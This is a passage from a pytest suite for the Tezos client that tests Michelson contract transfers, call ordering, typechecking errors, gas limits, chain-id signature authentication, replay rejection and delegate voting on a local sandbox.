        # bootstrap2 pays the fee; funds flow from manager to manager2.
        balance = client.get_mutez_balance('manager')
        balance_dest = client.get_mutez_balance('manager2')
        balance_bootstrap = client.get_mutez_balance('bootstrap2')
        amount = 10
        amount_mutez = utils.mutez_of_tez(amount)
        client.transfer(
            amount,
            'manager',
            'manager2',
            ['--gas-limit', f'{128 * 44950 + 112}'],
        )
        utils.bake(client, 'bootstrap5')
        new_balance = client.get_mutez_balance('manager')
        new_balance_dest = client.get_mutez_balance('manager2')
        new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
        fee = 0.001124
        fee_mutez = utils.mutez_of_tez(fee)
        assert balance_bootstrap - fee_mutez == new_balance_bootstrap
        assert balance - amount_mutez == new_balance
        assert balance_dest + amount_mutez == new_balance_dest

    def test_transfer_from_manager_to_default(self, client: Client):
        client.transfer(
            10, 'manager', 'bootstrap2', ['--entrypoint', 'default']
        )
        utils.bake(client, 'bootstrap5')
        client.transfer(10, 'manager', 'manager', ['--entrypoint', 'default'])
        utils.bake(client, 'bootstrap5')

    def test_transfer_from_manager_to_target(self, client: Client):
        client.transfer(10, 'manager', 'target', ['--burn-cap', '0.356'])
        utils.bake(client, 'bootstrap5')

    def test_transfer_from_manager_to_entrypoint_with_args(
        self, client: Client
    ):
        arg = 'Pair "hello" 42'
        # using 'transfer'
        client.transfer(
            0,
            'manager',
            'target',
            ['--entrypoint', 'add_left', '--arg', arg, '--burn-cap', '0.067'],
        )
        utils.bake(client, 'bootstrap5')
        client.transfer(
            0,
            'manager',
            'target',
            ['--entrypoint', 'mem_left', '--arg', '"hello"'],
        )
        utils.bake(client, 'bootstrap5')
        # using 'call'
        client.call(
            'manager',
            'target',
            ['--entrypoint', 'add_left', '--arg', arg, '--burn-cap', '0.067'],
        )
        utils.bake(client, 'bootstrap5')
        client.call(
            'manager',
            'target',
            ['--entrypoint', 'mem_left', '--arg', '"hello"'],
        )
        utils.bake(client, 'bootstrap5')

    def test_transfer_from_manager_no_entrypoint_with_args(
        self, client: Client
    ):
        arg = 'Left Unit'
        client.transfer(0, 'manager', 'target_no_entrypoints', ['--arg', arg])
        utils.bake(client, 'bootstrap5')
        client.call('manager', 'target_no_entrypoints', ['--arg', arg])
        utils.bake(client, 'bootstrap5')

    def test_transfer_from_manager_to_no_default_with_args(
        self, client: Client
    ):
        arg = 'Left Unit'
        client.transfer(0, 'manager', 'target_no_default', ['--arg', arg])
        utils.bake(client, 'bootstrap5')
        client.call('manager', 'target_no_default', ['--arg', arg])
        utils.bake(client, 'bootstrap5')

    def test_transfer_from_manager_to_rooted_target_with_args(
        self, client: Client
    ):
        arg = 'Left Unit'
        client.transfer(
            0,
            'manager',
            'rooted_target',
            ['--arg', arg, '--entrypoint', 'root'],
        )
        utils.bake(client, 'bootstrap5')
        client.call(
            'manager', 'rooted_target', ['--arg', arg, '--entrypoint', 'root']
        )
        utils.bake(client, 'bootstrap5')

    def test_transfer_json_to_entrypoint_with_args(self, client):
        # Same call as above, but submitted as a JSON operation batch.
        balance = client.get_mutez_balance('manager')
        balance_bootstrap = client.get_mutez_balance('bootstrap2')
        fee = 0.0123
        fee_mutez = utils.mutez_of_tez(fee)
        json_obj = [
            {
                "destination": "target",
                "amount": "0",
                "fee": str(fee),
                "gas-limit": "65942",
                "storage-limit": "1024",
                "arg": 'Pair "hello" 42',
                "entrypoint": "add_left",
            }
        ]
        json_ops = json.dumps(json_obj, separators=(',', ':'))
        client.run(client.cmd_batch('manager', json_ops))
        utils.bake(client, 'bootstrap5')
        new_balance = client.get_mutez_balance('manager')
        new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
        assert balance == new_balance
        assert balance_bootstrap - fee_mutez == new_balance_bootstrap

    def test_multiple_transfers(self, client):
        # Two transfers batched in one JSON operation.
        balance = client.get_mutez_balance('manager')
        balance_bootstrap2 = client.get_mutez_balance('bootstrap2')
        balance_bootstrap3 = client.get_mutez_balance('bootstrap3')
        amount_2 = 10.1
        amount_mutez_2 = utils.mutez_of_tez(amount_2)
        amount_3 = 11.01
        amount_mutez_3 = utils.mutez_of_tez(amount_3)
        json_obj = [
            {"destination": "bootstrap2", "amount": str(amount_2)},
            {"destination": "bootstrap3", "amount": str(amount_3)},
        ]
        json_ops = json.dumps(json_obj, separators=(',', ':'))
        client.run(client.cmd_batch('manager', json_ops))
        utils.bake(client, 'bootstrap5')
        new_balance = client.get_mutez_balance('manager')
        new_balance_bootstrap2 = client.get_mutez_balance('bootstrap2')
        new_balance_bootstrap3 = client.get_mutez_balance('bootstrap3')
        # Sum of the expected fees of the two batched operations, in mutez.
        fee_mutez = 794 + 698
        assert balance - amount_mutez_2 - amount_mutez_3 == new_balance
        assert (
            balance_bootstrap2 + amount_mutez_2 - fee_mutez
            == new_balance_bootstrap2
        )
        assert balance_bootstrap3 + amount_mutez_3 == new_balance_bootstrap3
# This test to verifies contract execution order. There are 3
# contracts: Storer, Caller, and Appender. Storer appends its argument
# to storage. Caller calls the list of unit contracts in its
# storage. Appender calls the string contract in its storage with a
# stored argument.
#
# For each test, there is one unique Storer. Each test is
# parameterized by a tree and the expected final storage of the
# Storer. A leaf in the tree is a string. Inner nodes are lists of
# leafs/inner nodes. The test maps maps over this tree to build a
# tree of contracts. Leaf nodes map to Appender contracts calling
# the Storer. Inner nodes map to Caller contract that calling
# children.
#
# Example. Given the tree: ["A", ["B"], "C"], we obtain
# Caller([Appender("A"), Caller([Appender("B")]), Appender("C")])
# Before the protocol 009, contract execution order was in BFS
# In BFS, Storer would've ended up with storage ACB.
# In DFS, Storer will end up with storage ABC.
@pytest.mark.contract
@pytest.mark.incremental
class TestExecutionOrdering:
    """Check that inter-contract calls execute depth-first (DFS).

    A tree of Caller/Appender contracts is deployed; the Storer contract
    records the order in which the Appenders reached it.  The expected
    storage strings encode DFS order (BFS order, used before protocol
    009, is noted per test case).
    """

    # Michelson sources for the three contract roles.
    STORER = f'{CONTRACT_PATH}/mini_scenarios/execution_order_storer.tz'
    CALLER = f'{CONTRACT_PATH}/mini_scenarios/execution_order_caller.tz'
    APPENDER = f'{CONTRACT_PATH}/mini_scenarios/execution_order_appender.tz'

    def originate_storer(self, client: Client, session: dict):
        # Storer starts with empty string storage; returns its address.
        origination = originate(
            client, session, self.STORER, '""', 0, arguments=['--force']
        )
        session['storer'] = origination.contract
        utils.bake(client, 'bootstrap3')
        return origination.contract

    def originate_appender(
        self, client: Client, session: dict, storer: str, argument: str
    ):
        # Appender stores (storer address, string to append); returns
        # its address.
        origination = originate(
            client,
            session,
            self.APPENDER,
            f'Pair "{storer}" "{argument}"',
            0,
            contract_name=f'appender-{argument}',
            arguments=['--force'],
        )
        session[f'appender.{argument}'] = origination.contract
        utils.bake(client, 'bootstrap3')
        return origination.contract

    def originate_caller(
        self, client: Client, session: dict, callees: List[str]
    ):
        # Caller stores the list of contract addresses it will invoke.
        storage = "{" + '; '.join(map('"{}"'.format, callees)) + "}"
        origination = originate(
            client,
            session,
            self.CALLER,
            storage,
            0,
            contract_name=f'caller-{hash(storage)}',
        )
        utils.bake(client, 'bootstrap3')
        return origination.contract

    @pytest.mark.parametrize(
        "tree, expected",
        [
            # before 009, the result should be "DABCEFG".
            ([["A", "B", "C"], "D", ["E", "F", "G"]], "ABCDEFG"),
            # before 009, the result should be "ACB".
            ([["A", ["B"], "C"]], "ABC"),
            # before 009, the result should be "ABDC".
            ([["A", ["B", ["C"], "D"]]], "ABCD"),
            ([], ""),
        ],
    )
    def test_ordering(
        self,
        client: Client,
        session: dict,
        # approximation of recursive type annotation
        tree: Union[str, List[Any]],
        expected: str,
    ):
        storer = self.originate_storer(client, session)

        def deploy_tree(tree: Union[str, List[Any]]) -> str:
            # leaf
            if isinstance(tree, str):
                # deploy and return caller str
                return self.originate_appender(client, session, storer, tree)
            # inner node
            children = list(map(deploy_tree, tree))
            return self.originate_caller(client, session, children)

        root = deploy_tree(tree)
        # Trigger the whole call tree and check the recorded order.
        client.transfer(
            0,
            'bootstrap2',
            root,
            ["--burn-cap", "5"],
        )
        utils.bake(client, 'bootstrap3')
        assert client.get_storage(storer) == '"{}"'.format(expected)
@pytest.mark.slow
@pytest.mark.contract
class TestContracts:
    """Test type checking and execution of a bunch of contracts"""

    @pytest.mark.parametrize("contract", all_contracts())
    def test_typecheck(self, client: Client, contract):
        # Every well-typed test contract must typecheck successfully.
        assert contract.endswith(
            '.tz'
        ), "test contract should have .tz extension"
        client.typecheck(os.path.join(CONTRACT_PATH, contract))

    @pytest.mark.parametrize("contract", all_legacy_contracts())
    def test_deprecated_typecheck_breaks(self, client, contract):
        # Legacy contracts must be rejected in normal (non-legacy) mode.
        if contract in [
            "legacy/create_contract.tz",
            "legacy/create_contract_flags.tz",
            "legacy/create_contract_rootname.tz",
        ]:
            with utils.assert_run_failure(r'ill-typed script'):
                client.typecheck(os.path.join(CONTRACT_PATH, contract))
        else:
            with utils.assert_run_failure(r'Use of deprecated instruction'):
                client.typecheck(os.path.join(CONTRACT_PATH, contract))

    @pytest.mark.parametrize("contract", all_legacy_contracts())
    def test_deprecated_typecheck_in_legacy(self, client, contract):
        # Legacy contracts are rejected even in legacy mode.
        if contract in [
            "legacy/create_contract.tz",
            "legacy/create_contract_flags.tz",
            "legacy/create_contract_rootname.tz",
        ]:
            with utils.assert_run_failure(r'ill-typed script'):
                client.typecheck(
                    os.path.join(CONTRACT_PATH, contract), legacy=True
                )
        else:
            with utils.assert_run_failure(r'Use of deprecated instruction'):
                client.typecheck(
                    os.path.join(CONTRACT_PATH, contract), legacy=True
                )

    @pytest.mark.parametrize(
        "contract,error_pattern",
        [
            # operations cannot be PACKed
            (
                "pack_operation.tz",
                r'operation type forbidden in parameter, storage and constants',
            ),
            # big_maps cannot be PACKed
            (
                "pack_big_map.tz",
                r'big_map or sapling_state type not expected here',
            ),
            (
                "invalid_self_entrypoint.tz",
                r'Contract has no entrypoint named D',
            ),
            ("contract_annotation_default.tz", r'unexpected annotation'),
            # Missing field
            (
                "missing_only_storage_field.tz",
                r'Missing contract field: storage',
            ),
            ("missing_only_code_field.tz", r'Missing contract field: code'),
            (
                "missing_only_parameter_field.tz",
                r'Missing contract field: parameter',
            ),
            (
                "missing_parameter_and_storage_fields.tz",
                r'Missing contract field: parameter',
            ),
            # Duplicated field
            (
                "multiple_parameter_field.tz",
                r'duplicate contract field: parameter',
            ),
            ("multiple_code_field.tz", r'duplicate contract field: code'),
            ("multiple_storage_field.tz", r'duplicate contract field: storage'),
            # The first duplicated field is reported, storage in this case
            (
                "multiple_storage_and_code_fields.tz",
                r'duplicate contract field: storage',
            ),
            # error message for set update on non-comparable type
            (
                "set_update_non_comparable.tz",
                r'Type nat is not compatible with type list operation',
            ),
            # error message for the arity of the chain_id type
            (
                "chain_id_arity.tz",
                r'primitive chain_id expects 0 arguments but is given 1',
            ),
            # error message for DIP over the limit
            ("big_dip.tz", r'expected a positive 10-bit integer'),
            # error message for DROP over the limit
            ("big_drop.tz", r'expected a positive 10-bit integer'),
            # error message for set update on non-comparable type
            (
                "set_update_non_comparable.tz",
                r'Type nat is not compatible with type list operation',
            ),
            # error message for attempting to push a value of type never
            ("never_literal.tz", r'type never has no inhabitant.'),
            # field annotation mismatch with UNPAIR
            (
                "unpair_field_annotation_mismatch.tz",
                r'The field access annotation does not match',
            ),
            # COMB, UNCOMB, and DUP cannot take 0 as argument
            ("comb0.tz", r"PAIR expects an argument of at least 2"),
            ("comb1.tz", r"PAIR expects an argument of at least 2"),
            ("uncomb0.tz", r"UNPAIR expects an argument of at least 2"),
            ("uncomb1.tz", r"UNPAIR expects an argument of at least 2"),
            ("dup0.tz", r"DUP n expects an argument of at least 1"),
            (
                "push_big_map_with_id_with_parens.tz",
                r"big_map or sapling_state type not expected here",
            ),
            (
                "push_big_map_with_id_without_parens.tz",
                r"primitive PUSH expects 2 arguments but is given 4",
            ),
            # sapling_state is not packable
            (
                "pack_sapling_state.tz",
                r"big_map or sapling_state type not expected here",
            ),
            # sapling_state is not packable
            (
                "unpack_sapling_state.tz",
                r"big_map or sapling_state type not expected here",
            ),
            # Ticket duplication attempt
            ("ticket_dup.tz", r'DUP used on the non-dupable type ticket nat'),
            # error message for ticket unpack
            ("ticket_unpack.tz", r'Ticket in unauthorized position'),
            # error message for attempting to use APPLY to capture a ticket
            ("ticket_apply.tz", r'Ticket in unauthorized position'),
            # error message for attempting to wrap a ticket in a ticket
            (
                "ticket_in_ticket.tz",
                r'comparable type expected.Type ticket unit is not comparable',
            ),
        ],
    )
    def test_ill_typecheck(self, client: Client, contract, error_pattern):
        # Each ill-typed contract must fail with its specific error.
        with utils.assert_run_failure(error_pattern):
            client.typecheck(os.path.join(ILLTYPED_CONTRACT_PATH, contract))

    def test_zero_transfer_to_implicit_contract(self, client):
        pubkey = IDENTITIES['bootstrap3']['identity']
        err = (
            'Transaction of 0ꜩ towards a contract without code are '
            rf'forbidden \({pubkey}\).'
        )
        with utils.assert_run_failure(err):
            client.transfer(0, 'bootstrap2', 'bootstrap3', [])

    def test_zero_transfer_to_nonexistent_contract(self, client):
        nonexistent = "KT1Fcq4inD44aMhmUiTEHR1QMQwJT7p2u641"
        err = rf'Contract {nonexistent} does not exist'
        with utils.assert_run_failure(err):
            client.transfer(0, 'bootstrap2', nonexistent, [])
FIRST_EXPLOSION = '''
{ parameter unit;
storage unit;
code{ DROP; PUSH nat 0 ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DROP ; UNIT ; NIL operation ; PAIR} }
'''
# FIRST_EXPLOSION costs a large amount of gas just for typechecking.
# FIRST_EXPLOSION_BIGTYPE type size exceeds the protocol set bound.
FIRST_EXPLOSION_BIGTYPE = '''
{ parameter unit;
storage unit;
code{ DROP; PUSH nat 0 ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DUP ; PAIR ;
DROP ; UNIT ; NIL operation ; PAIR} }
'''
SECOND_EXPLOSION = '''
{ parameter (list int) ;
storage (list (list (list int))) ;
code { CAR ; DIP { NIL (list int) } ;
DUP ; ITER { DROP ; DUP ; DIP { CONS } } ;
DROP ; DIP { NIL (list (list int)) } ;
DUP ; ITER { DROP ; DUP ; DIP { CONS } } ;
DROP ; NIL operation ; PAIR } }
'''
@pytest.mark.contract
class TestGasBound:
    """Check gas/type-size limits and literal well-formedness errors."""

    def test_write_contract(self, tmpdir, session: dict):
        # Materialize the inline Michelson sources above as .tz files and
        # remember their paths in the session for the following tests.
        items = {
            'first_explosion.tz': FIRST_EXPLOSION,
            'first_explosion_bigtype.tz': FIRST_EXPLOSION_BIGTYPE,
            'second_explosion.tz': SECOND_EXPLOSION,
        }.items()
        for name, script in items:
            contract = f'{tmpdir}/{name}'
            with open(contract, 'w') as contract_file:
                contract_file.write(script)
            session[name] = contract

    def test_originate_first_explosion(self, client: Client, session: dict):
        # Typechecks fine, but origination under a small gas limit fails.
        name = 'first_explosion.tz'
        contract = session[name]
        client.typecheck(contract)
        args = ['-G', f'{1870}', '--burn-cap', '10']
        expected_error = "Gas limit exceeded during typechecking or execution"
        with utils.assert_run_failure(expected_error):
            client.originate(f'{name}', 0, 'bootstrap1', contract, args)

    def test_originate_big_type(self, client: Client, session: dict):
        name = 'first_explosion_bigtype.tz'
        contract = session[name]
        # We could not be bothered with finding how to escape parentheses
        # so we put dots
        expected_error = "type size .1023. exceeded maximum type size .1000."
        with utils.assert_run_failure(expected_error):
            client.typecheck(contract)

    def test_originate_second_explosion(self, client: Client, session: dict):
        # A small input list runs within the default gas bound.
        name = 'second_explosion.tz'
        contract = session[name]
        storage = '{}'
        inp = '{1;2;3;4;5;6;7;8;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1;1}'
        client.run_script(contract, storage, inp)

    def test_originate_second_explosion_fail(
        self, client: Client, session: dict
    ):
        # A larger input makes storage serialization exceed the gas bound.
        name = 'second_explosion.tz'
        contract = session[name]
        storage = '{}'
        inp = (
            '{1;2;3;4;5;6;7;8;9;0;1;2;3;4;5;6;7;1;1;1;1;1;1;1;1;1;1;1'
            + ';1;1;1;1;1;1;1;1;1;1;1;1;1;1}'
        )
        expected_error = (
            "Cannot serialize the resulting storage"
            + " value within the provided gas bounds."
        )
        with utils.assert_run_failure(expected_error):
            client.run_script(contract, storage, inp, gas=9290)

    def test_typecheck_map_dup_key(self, client: Client):
        expected_error = (
            'Map literals cannot contain duplicate'
            + ' keys, however a duplicate key was found'
        )
        with utils.assert_run_failure(expected_error):
            client.typecheck_data('{ Elt 0 1 ; Elt 0 1}', '(map nat nat)')

    def test_typecheck_map_bad_ordering(self, client: Client):
        expected_error = (
            "Keys in a map literal must be in strictly"
            + " ascending order, but they were unordered in literal"
        )
        with utils.assert_run_failure(expected_error):
            client.typecheck_data(
                '{ Elt 0 1 ; Elt 10 1 ; Elt 5 1 }', '(map nat nat)'
            )

    def test_typecheck_set_bad_ordering(self, client: Client):
        expected_error = (
            "Values in a set literal must be in strictly"
            + " ascending order, but they were unordered in literal"
        )
        with utils.assert_run_failure(expected_error):
            client.typecheck_data('{ "A" ; "C" ; "B" }', '(set string)')

    def test_typecheck_set_no_duplicates(self, client: Client):
        expected_error = (
            "Set literals cannot contain duplicate values,"
            + " however a duplicate value was found"
        )
        with utils.assert_run_failure(expected_error):
            client.typecheck_data('{ "A" ; "B" ; "B" }', '(set string)')
@pytest.mark.contract
class TestChainId:
    """Tests of the CHAIN_ID instruction and chain-id-bound authentication."""

    def test_chain_id_opcode(self, client: Client, session: dict):
        """Originate the chain_id opcode contract and call it once."""
        path = os.path.join(CONTRACT_PATH, 'opcodes', 'chain_id.tz')
        originate(client, session, path, 'Unit', 0)
        client.call('bootstrap2', "chain_id", [])
        utils.bake(client, 'bootstrap5')

    def test_chain_id_authentication_origination(self, client: Client, session):
        """Originate authentication.tz with counter 0 and bootstrap1's
        public key as initial storage."""
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'authentication.tz'
        )
        pubkey = IDENTITIES['bootstrap1']['public']
        originate(client, session, path, f'Pair 0 "{pubkey}"', 1000)
        utils.bake(client, 'bootstrap5')

    def test_chain_id_authentication_first_run(
        self, client: Client, session: dict
    ):
        """Pack (chain_id, contract, lambda, counter), sign it with
        bootstrap1's key, and submit the signed operation lambda."""
        destination = IDENTITIES['bootstrap2']['identity']
        # Lambda that transfers 1000 mutez to the destination account.
        operation = (
            '{DROP; NIL operation; '
            + f'PUSH address "{destination}"; '
            + 'CONTRACT unit; ASSERT_SOME; PUSH mutez 1000; UNIT; '
            + 'TRANSFER_TOKENS; CONS}'
        )
        chain_id = client.rpc('get', 'chains/main/chain_id')
        contract_address = session['contract']
        # The payload must be packed exactly as the contract repacks it,
        # including the current chain id and the counter (0 on first run).
        packed = client.pack(
            f'Pair (Pair "{chain_id}" "{contract_address}") '
            + f'(Pair {operation} 0)',
            'pair (pair chain_id address)'
            + '(pair (lambda unit (list operation)) nat)',
        )
        signature = client.sign_bytes_of_string(packed, "bootstrap1")
        client.call(
            'bootstrap2',
            'authentication',
            ['--arg', f'Pair {operation} \"{signature}\"'],
        )
        utils.bake(client, 'bootstrap5')
@pytest.mark.contract
class TestBigMapToSelf:
    """Tests a contract that sends its own big_map back to itself."""

    def test_big_map_to_self_origination(self, client: Client, session: dict):
        """Originate big_map_to_self.tz with an empty big_map."""
        path = os.path.join(CONTRACT_PATH, 'opcodes', 'big_map_to_self.tz')
        originate(client, session, path, '{}', 0)
        utils.bake(client, 'bootstrap5')

    def test_big_map_to_self_transfer(self, client: Client):
        """Both the `call` and `transfer` client entry points must succeed."""
        client.call('bootstrap2', "big_map_to_self", [])
        utils.bake(client, 'bootstrap5')
        client.transfer(0, 'bootstrap2', "big_map_to_self", [])
        utils.bake(client, 'bootstrap5')
@pytest.mark.contract
class TestNonRegression:
    """Test contract-related non-regressions"""

    def test_issue_242_originate(self, client: Client, session: dict):
        """Originate the regression contract for bug 262 with 1 tez."""
        path = os.path.join(CONTRACT_PATH, 'non_regression', 'bug_262.tz')
        originate(client, session, path, 'Unit', 1)

    def test_issue_242_assert_balance(self, client: Client):
        """The contract must keep its initial 1 tez balance."""
        assert client.get_balance('bug_262') == 1
@pytest.mark.contract
class TestMiniScenarios:
    """Test mini scenarios"""

    # replay.tz related tests
    def test_replay_originate(self, client: Client, session: dict):
        """Originate the replay-detection contract."""
        path = os.path.join(CONTRACT_PATH, 'mini_scenarios', 'replay.tz')
        originate(client, session, path, 'Unit', 0)

    def test_replay_transfer_fail(self, client: Client):
        """Calling the contract must be rejected as an internal replay."""
        with utils.assert_run_failure("Internal operation replay attempt"):
            client.transfer(10, "bootstrap1", "replay", [])

    # create_contract.tz related tests
    def test_create_contract_originate(self, client: Client, session: dict):
        """Originate the contract-creating contract with 1000 tez."""
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'create_contract.tz'
        )
        originate(client, session, path, 'Unit', 1000)

    def test_create_contract_balance(self, client: Client):
        """The parent still holds its full balance before creation."""
        assert client.get_balance('create_contract') == 1000

    def test_create_contract_perform_creation(self, client: Client):
        """Trigger CREATE_CONTRACT, then check the child's storage and the
        100 tez moved from the parent to the child."""
        transfer_result = client.transfer(
            0,
            "bootstrap1",
            "create_contract",
            ['-arg', 'None', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        # The new contract's address is only reported in the client output.
        pattern = r"New contract (\w*) originated"
        match = re.search(pattern, transfer_result.client_output)
        assert match is not None
        kt_1 = match.groups()[0]
        assert client.get_storage(kt_1) == '"abcdefg"'
        assert client.get_balance(kt_1) == 100
        assert client.get_balance('create_contract') == 900

    # Originates a contract that when called, creates a contract with a
    # rootname annotation. Such annotations come in two flavors, thus the
    # parameterization. Then calls the first contract and verifies the
    # existence and type of the root entrypoint of the created contract.
    @pytest.mark.parametrize(
        "contract",
        [
            'create_contract_rootname.tz',
            'create_contract_rootname_alt.tz',
        ],
    )
    def test_create_contract_rootname_originate(
        self, client: Client, session: dict, contract
    ):
        """Create a child contract and check its %root entrypoint type."""
        path = os.path.join(CONTRACT_PATH, 'opcodes', contract)
        origination_res = originate(client, session, path, 'None', 1000)
        transfer_result = client.transfer(
            0,
            "bootstrap1",
            origination_res.contract,
            ['-arg', 'Unit', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        pattern = r"New contract (\w*) originated"
        match = re.search(pattern, transfer_result.client_output)
        assert match is not None
        kt_1 = match.groups()[0]
        entrypoint_type = client.get_contract_entrypoint_type(
            'root', kt_1
        ).entrypoint_type
        # NOTE(review): the two adjacent literals below concatenate
        # without a space ("existwith") — harmless, assertion message only.
        assert entrypoint_type == 'unit', (
            'the entrypoint my_root of the originated contract should exist'
            'with type unit'
        )

    # default_account.tz related tests
    def test_default_account_originate(self, client: Client, session: dict):
        """Originate the default_account contract with 1000 tez."""
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'default_account.tz'
        )
        originate(client, session, path, 'Unit', 1000)

    def test_default_account_transfer_then_bake(self, client: Client):
        """The contract credits 100 tez to a bootstrap key and then to a
        fresh implicit account."""
        tz1 = IDENTITIES['bootstrap4']['identity']
        client.transfer(
            0,
            "bootstrap1",
            "default_account",
            ['-arg', f'"{tz1}"', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        account = 'tz1SuakBpFdG9b4twyfrSMqZzruxhpMeSrE5'
        client.transfer(
            0,
            "bootstrap1",
            "default_account",
            ['-arg', f'"{account}"', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        assert client.get_balance(account) == 100

    # Test bytes, SHA256, CHECK_SIGNATURE
    def test_reveal_signed_preimage_originate(
        self, client: Client, session: dict
    ):
        """Originate reveal_signed_preimage.tz storing a hash and a key."""
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'reveal_signed_preimage.tz'
        )
        byt = (
            '0x9995c2ef7bcc7ae3bd15bdd9b02'
            + 'dc6e877c27b26732340d641a4cbc6524813bb'
        )
        sign = 'p2pk66uq221795tFxT7jfNmXtBMdjMf6RAaxRTwv1dbuSHbH6yfqGwz'
        storage = f'(Pair {byt} "{sign}")'
        originate(client, session, path, storage, 1000)

    def test_wrong_preimage(self, client: Client):
        """A preimage whose hash does not match the stored hash fails."""
        byt = (
            '0x050100000027566f756c657a2d766f75732'
            + '0636f75636865722061766563206d6f692c20636520736f6972'
        )
        sign = (
            'p2sigvgDSBnN1bUsfwyMvqpJA1cFhE5s5oi7SetJ'
            + 'VQ6LJsbFrU2idPvnvwJhf5v9DhM9ZTX1euS9DgWozVw6BTHiK9VcQVpAU8'
        )
        arg = f'(Pair {byt} "{sign}")'
        # We check failure of ASSERT_CMPEQ in the script.
        with utils.assert_run_failure("At line 8 characters 9 to 21"):
            client.transfer(
                0,
                "bootstrap1",
                "reveal_signed_preimage",
                ['-arg', arg, '--burn-cap', '10'],
            )

    def test_wrong_signature(self, client: Client):
        """A signature that does not match the stored key is rejected."""
        byt = (
            '0x050100000027566f756c657a2d766f757320636'
            + 'f75636865722061766563206d6f692c20636520736f6972203f'
        )
        sign = (
            'p2sigvgDSBnN1bUsfwyMvqpJA1cFhE5s5oi7SetJVQ6'
            + 'LJsbFrU2idPvnvwJhf5v9DhM9ZTX1euS9DgWozVw6BTHiK9VcQVpAU8'
        )
        arg = f'(Pair {byt} "{sign}")'
        # We check failure of CHECK_SIGNATURE ; ASSERT in the script.
        with utils.assert_run_failure("At line 15 characters 9 to 15"):
            client.transfer(
                0,
                "bootstrap1",
                "reveal_signed_preimage",
                ['-arg', arg, '--burn-cap', '10'],
            )

    def test_good_preimage_and_signature(self, client: Client):
        """With matching preimage and signature the transfer succeeds."""
        byt = (
            '0x050100000027566f756c657a2d766f757320636f7563'
            + '6865722061766563206d6f692c20636520736f6972203f'
        )
        sign = (
            'p2sigsceCzcDw2AeYDzUonj4JT341WC9Px4wdhHBxbZcG1F'
            + 'hfqFVuG7f2fGCzrEHSAZgrsrQWpxduDPk9qZRgrpzwJnSHC3gZJ'
        )
        arg = f'(Pair {byt} "{sign}")'
        client.transfer(
            0,
            "bootstrap1",
            "reveal_signed_preimage",
            ['-arg', arg, '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')

    # Test vote_for_delegate
    def test_vote_for_delegate_originate(self, client: Client, session: dict):
        """Originate vote_for_delegate.tz with bootstrap3/4 as the voters."""
        b_3 = IDENTITIES['bootstrap3']['identity']
        b_4 = IDENTITIES['bootstrap4']['identity']
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'vote_for_delegate.tz'
        )
        storage = f'''(Pair (Pair "{b_3}" None) (Pair "{b_4}" None))'''
        originate(client, session, path, storage, 1000)
        assert client.get_delegate('vote_for_delegate').delegate is None

    def test_vote_for_delegate_wrong_identity1(self, client: Client):
        """Non-voter bootstrap1 may not vote."""
        # We check failure of CHECK_SIGNATURE ; ASSERT in the script.
        with utils.assert_run_failure("At line 15 characters 57 to 61"):
            client.transfer(
                0,
                "bootstrap1",
                "vote_for_delegate",
                ['-arg', 'None', '--burn-cap', '10'],
            )

    def test_vote_for_delegate_wrong_identity2(self, client: Client):
        """Non-voter bootstrap2 may not vote."""
        # We check failure of CHECK_SIGNATURE ; ASSERT in the script.
        with utils.assert_run_failure("At line 15 characters 57 to 61"):
            client.transfer(
                0,
                "bootstrap2",
                "vote_for_delegate",
                ['-arg', 'None', '--burn-cap', '10'],
            )

    def test_vote_for_delegate_b3_vote_for_b5(self, client: Client):
        """bootstrap3 votes for bootstrap5; the vote shows in storage."""
        b_5 = IDENTITIES['bootstrap5']['identity']
        client.transfer(
            0,
            "bootstrap3",
            "vote_for_delegate",
            ['-arg', f'(Some "{b_5}")', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        storage = client.get_storage('vote_for_delegate')
        assert re.search(b_5, storage)

    def test_vote_for_delegate_still_no_delegate1(self, client: Client):
        """A single vote does not set the delegate yet."""
        assert client.get_delegate('vote_for_delegate').delegate is None

    def test_vote_for_delegate_b4_vote_for_b2(self, client: Client):
        """bootstrap4 votes for bootstrap2; the two votes now disagree."""
        b_2 = IDENTITIES['bootstrap2']['identity']
        client.transfer(
            0,
            "bootstrap4",
            "vote_for_delegate",
            ['-arg', f'(Some "{b_2}")', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        storage = client.get_storage('vote_for_delegate')
        assert re.search(b_2, storage)

    def test_vote_for_delegate_still_no_delegate2(self, client: Client):
        """Disagreeing votes leave the delegate unset."""
        assert client.get_delegate('vote_for_delegate').delegate is None

    def test_vote_for_delegate_b4_vote_for_b5(self, client: Client):
        """bootstrap4 switches its vote to bootstrap5."""
        b_5 = IDENTITIES['bootstrap5']['identity']
        client.transfer(
            0,
            "bootstrap4",
            "vote_for_delegate",
            ['-arg', f'(Some "{b_5}")', '--burn-cap', '10'],
        )
        utils.bake(client, 'bootstrap5')
        storage = client.get_storage('vote_for_delegate')
        assert re.search(b_5, storage)

    def test_vote_for_delegate_has_delegate(self, client: Client):
        """Both voters now agree on bootstrap5, which becomes the delegate."""
        b_5 = IDENTITIES['bootstrap5']['identity']
        result = client.get_delegate('vote_for_delegate')
        assert result.delegate == b_5

    def test_multiple_entrypoints_counter(self, session: dict, client: Client):
        """The contract creates an internal contract, calls it, and ends
        with its storage back to None."""
        path = os.path.join(
            CONTRACT_PATH, 'mini_scenarios', 'multiple_entrypoints_counter.tz'
        )
        storage = 'None'
        # originate contract
